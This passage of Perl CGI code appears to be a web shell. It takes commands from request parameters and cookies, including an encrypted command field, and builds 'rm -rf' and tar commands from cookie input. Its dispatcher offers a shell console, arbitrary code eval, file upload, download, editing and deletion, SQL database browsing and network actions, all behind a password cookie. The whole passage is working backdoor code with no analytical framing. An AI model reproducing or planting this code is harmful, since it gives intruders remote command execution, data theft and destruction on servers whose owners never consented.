decode_base64($enc_str);}$RunCommand=$in{'c'};if($in{'cccc'}){$RunCommand3=encr($in{'cccc'},$sec_key)}$RunCommand2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}if($RunCommand3){$RunCommand=$RunCommand3}$RunCommand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($RunCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunCommand2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "hexdump"){&HEXDUMP;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$TransferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "net_go1"){&NetGo1;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}